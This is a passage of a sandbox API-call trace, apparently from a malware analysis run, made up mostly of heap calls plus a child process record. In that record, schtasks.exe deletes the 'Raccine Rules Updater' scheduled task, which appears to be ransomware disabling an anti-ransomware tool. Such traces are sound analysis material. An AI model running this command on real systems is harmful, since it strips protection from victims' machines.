hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5700 | out: hHeap=0x3e0000) returned 1 [0081.612] GetProcessHeap () returned 0x3e0000 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5730) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5730) returned 0x4e [0081.613] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5730 | out: hHeap=0x3e0000) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5788) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5788) returned 0x200 [0081.613] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5788 | out: hHeap=0x3e0000) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eeeb0) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eeeb0) returned 0x10 [0081.613] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eeeb0 | out: hHeap=0x3e0000) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c10) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4c10) returned 0x14 [0081.613] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c10 | out: hHeap=0x3e0000) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5ab0) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5ab0) returned 0x1000 [0081.613] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5ab0 | out: hHeap=0x3e0000) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eeee0) returned 1 [0081.613] GetProcessHeap () returned 0x3e0000 [0081.613] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eeee0) returned 0x10 [0081.614] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eeee0 | out: hHeap=0x3e0000) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4bf0) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4bf0) returned 0x14 [0081.614] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4bf0 | out: hHeap=0x3e0000) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f53b8) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f53b8) returned 0x32 [0081.614] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f53b8 | out: hHeap=0x3e0000) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee98) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eee98) returned 0x10 [0081.614] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee98 | out: hHeap=0x3e0000) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b78) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4b78) returned 0x14 [0081.614] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b78 | out: hHeap=0x3e0000) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3c38) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f3c38) returned 0x1e [0081.614] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3c38 | out: hHeap=0x3e0000) returned 1 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.614] GetProcessHeap () returned 0x3e0000 [0081.615] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee80) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eee80) returned 0x10 [0081.615] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee80 | out: hHeap=0x3e0000) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b58) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4b58) returned 0x14 [0081.615] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b58 | out: hHeap=0x3e0000) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5a20) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5a20) returned 0x88 [0081.615] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5a20 | out: hHeap=0x3e0000) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3748) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f3748) returned 0x14 [0081.615] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3748 | out: hHeap=0x3e0000) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5990) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5990) returned 0x88 [0081.615] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5990 | out: hHeap=0x3e0000) returned 1 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.615] GetProcessHeap () returned 0x3e0000 [0081.616] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3768) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f3768) returned 0x14 [0081.616] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3768 | out: hHeap=0x3e0000) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f53f8) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f53f8) returned 0x8 [0081.616] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f53f8 | out: hHeap=0x3e0000) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a78) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4a78) returned 0x14 [0081.616] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a78 | out: hHeap=0x3e0000) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a98) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4a98) returned 0x14 [0081.616] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a98 | out: hHeap=0x3e0000) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c30) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4c30) returned 0x14 [0081.616] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c30 | out: hHeap=0x3e0000) returned 1 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.616] GetProcessHeap () returned 0x3e0000 [0081.617] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c50) returned 1 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4c50) returned 0x14 [0081.617] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c50 | out: hHeap=0x3e0000) returned 1 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eeec8) returned 1 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eeec8) returned 0xe [0081.617] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eeec8 | out: hHeap=0x3e0000) returned 1 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c70) returned 1 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4c70) returned 0x14 [0081.617] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4c70 | out: hHeap=0x3e0000) returned 1 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee38) returned 1 [0081.617] GetProcessHeap () returned 0x3e0000 [0081.617] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eee38) returned 0x10 [0081.617] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee38 | out: hHeap=0x3e0000) returned 1 [0081.714] GetProcessHeap () returned 0x3e0000 [0081.714] GetProcessHeap () returned 0x3e0000 [0081.715] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ab8) returned 1 [0081.715] GetProcessHeap () returned 0x3e0000 [0081.715] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4ab8) returned 0x14 [0081.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ab8 | out: hHeap=0x3e0000) returned 1 [0081.715] GetProcessHeap () returned 0x3e0000 [0081.715] GetProcessHeap () returned 0x3e0000 [0081.715] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ad8) returned 1 [0081.715] GetProcessHeap () returned 0x3e0000 [0081.715] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4ad8) returned 0x14 [0081.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ad8 | out: hHeap=0x3e0000) returned 1 [0081.715] GetProcessHeap () returned 0x3e0000 [0081.715] GetProcessHeap () returned 0x3e0000 [0081.715] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4af8) returned 1 [0081.715] GetProcessHeap () returned 0x3e0000 [0081.715] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4af8) returned 0x14 [0081.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4af8 | out: hHeap=0x3e0000) returned 1 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b18) returned 1 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4b18) returned 0x14 [0081.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b18 | out: hHeap=0x3e0000) returned 1 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee50) returned 1 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eee50) returned 0x10 [0081.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee50 | out: hHeap=0x3e0000) returned 1 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b38) returned 1 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4b38) returned 0x14 [0081.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b38 | out: hHeap=0x3e0000) returned 1 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b98) returned 1 [0081.716] GetProcessHeap () returned 0x3e0000 [0081.716] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4b98) returned 0x14 [0081.717] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4b98 | out: hHeap=0x3e0000) returned 1 [0081.717] GetProcessHeap () returned 0x3e0000 [0081.717] GetProcessHeap () returned 0x3e0000 [0081.717] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee68) returned 1 [0081.717] GetProcessHeap () returned 0x3e0000 [0081.717] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eee68) returned 0x10 [0081.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee68 | out: hHeap=0x3e0000) returned 1 [0081.721] GetProcessHeap () returned 0x3e0000 [0081.721] GetProcessHeap () returned 0x3e0000 [0081.721] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4bd0) returned 1 [0081.721] GetProcessHeap () returned 0x3e0000 [0081.721] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4bd0) returned 0x14 [0081.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4bd0 | out: hHeap=0x3e0000) returned 1 [0081.721] GetProcessHeap () returned 0x3e0000 [0081.721] GetProcessHeap () returned 0x3e0000 [0081.721] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee20) returned 1 [0081.721] GetProcessHeap () returned 0x3e0000 [0081.721] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3eee20) returned 0x10 [0081.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3eee20 | out: hHeap=0x3e0000) returned 1 [0081.721] exit (_Code=1) Process: id = "8" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x17d4000" os_pid = "0x924" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"schtasks\" /DELETE /TN \"Raccine Rules Updater\" /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 80 os_tid = 0x934 [0081.454] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfc8c | out: lpSystemTimeAsFileTime=0xcfc8c*(dwLowDateTime=0xba26ed0, dwHighDateTime=0x1d6f0d1)) [0081.454] GetCurrentProcessId () returned 0x924 [0081.454] GetCurrentThreadId () returned 0x934 [0081.454] GetTickCount () returned 0x114adfc [0081.454] RtlQueryPerformanceCounter () returned 0x1 [0081.455] GetModuleHandleA (lpModuleName=0x0) returned 0x590000 [0081.455] __set_app_type (_Type=0x1) [0081.455] __p__fmode () returned 0x770331f4 [0081.455] __p__commode () returned 0x770331fc [0081.456] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x5a7881) returned 0x0 [0081.456] __wgetmainargs (in: _Argc=0x5b9e6c, _Argv=0x5b9e74, _Env=0x5b9e70, _DoWildCard=0, _StartInfo=0x5b9e80 | out: _Argc=0x5b9e6c, _Argv=0x5b9e74, _Env=0x5b9e70) returned 0 [0081.456] _onexit (_Func=0x5b0fe2) returned 0x5b0fe2 [0081.456] _onexit (_Func=0x5b0ff3) returned 0x5b0ff3 [0081.456] _onexit (_Func=0x5b1002) returned 0x5b1002 [0081.457] _onexit (_Func=0x5b101e) returned 0x5b101e [0081.457] _onexit (_Func=0x5b103a) returned 0x5b103a [0081.457] _onexit (_Func=0x5b1056) returned 0x5b1056 [0081.457] _onexit (_Func=0x5b1072) returned 0x5b1072 [0081.457] _onexit (_Func=0x5b108e) returned 0x5b108e [0081.457] _onexit (_Func=0x5b10aa) returned 0x5b10aa [0081.457] _onexit (_Func=0x5b10c6) returned 0x5b10c6 [0081.457] _onexit (_Func=0x5b10e2) returned 0x5b10e2 [0081.457] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0081.458] WinSqmIsOptedIn () returned 0x0 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4a50 [0081.458] SetLastError (dwErrCode=0x0) [0081.458] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0081.458] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0081.458] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0081.458] VerifyVersionInfoW (in: lpVersionInformation=0xcf704, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xcf704) returned 1 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4a68 [0081.458] lstrlenW (lpString="") returned 0 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x2) returned 0x1c4e38 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4e48 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4a80 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4e68 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4e88 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4ea8 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4ec8 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4a98 [0081.458] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4ee8 [0081.459] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4f08 [0081.459] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4f28 [0081.459] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4f48 [0081.459] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4ab0 [0081.459] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4f68 [0081.459] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4fa0 [0081.459] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4fc0 [0081.459] GetProcessHeap () returned 0x1b0000 [0081.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c4fe0 [0081.459] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.462] SetLastError (dwErrCode=0x0) [0081.462] GetProcessHeap () returned 0x1b0000 [0081.462] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5000 [0081.462] GetProcessHeap () returned 0x1b0000 [0081.462] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5020 [0081.462] GetProcessHeap () returned 0x1b0000 [0081.462] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5040 [0081.462] GetProcessHeap () returned 0x1b0000 [0081.462] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5060 [0081.462] GetProcessHeap () returned 0x1b0000 [0081.462] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5080 [0081.462] GetProcessHeap () returned 0x1b0000 [0081.462] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4ac8 [0081.462] _memicmp (_Buf1=0x1c4ac8, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.462] GetProcessHeap () returned 0x1b0000 [0081.462] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x208) returned 0x1c5908 [0081.462] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1c5908, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0081.462] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x755a0000 [0081.464] GetProcAddress (hModule=0x755a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x755a19d9 [0081.464] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0081.464] GetProcessHeap () returned 0x1b0000 [0081.464] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x74e) returned 0x1c5b18 [0081.464] GetProcAddress (hModule=0x755a0000, lpProcName="GetFileVersionInfoW") returned 0x755a19f4 [0081.464] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x1c5b18 | out: lpData=0x1c5b18) returned 1 [0081.464] GetProcAddress (hModule=0x755a0000, lpProcName="VerQueryValueW") returned 0x755a1b51 [0081.464] VerQueryValueW (in: pBlock=0x1c5b18, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcf80c, puLen=0xcf810 | out: lplpBuffer=0xcf80c*=0x1c5eb4, puLen=0xcf810) returned 1 [0081.465] _memicmp (_Buf1=0x1c4ac8, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.465] _vsnwprintf (in: _Buffer=0x1c5908, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xcf7f4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0081.465] VerQueryValueW (in: pBlock=0x1c5b18, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xcf81c, puLen=0xcf818 | out: lplpBuffer=0xcf81c*=0x1c5ce0, puLen=0xcf818) returned 1 [0081.465] lstrlenW (lpString="schtasks.exe") returned 12 [0081.465] lstrlenW (lpString="schtasks.exe") returned 12 [0081.465] lstrlenW (lpString=".EXE") returned 4 [0081.465] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0081.493] lstrlenW (lpString="schtasks.exe") returned 12 [0081.493] lstrlenW (lpString=".EXE") returned 4 [0081.493] _memicmp (_Buf1=0x1c4ac8, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.493] lstrlenW (lpString="schtasks") returned 8 [0081.493] GetProcessHeap () returned 0x1b0000 [0081.493] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c50c0 [0081.493] GetProcessHeap () returned 0x1b0000 [0081.493] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c50e0 [0081.493] GetProcessHeap () returned 0x1b0000 [0081.493] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5100 [0081.493] GetProcessHeap () returned 0x1b0000 [0081.493] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1c5120 [0081.493] GetProcessHeap () returned 0x1b0000 [0081.493] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1c4b28 [0081.493] _memicmp (_Buf1=0x1c4b28, _Buf2=0x591ed8, _Size=0x7) returned 0 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xa0) returned 0x1c64f8 [0081.494] GetProcessHeap () returned 0x1b0000 [0081.494] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, 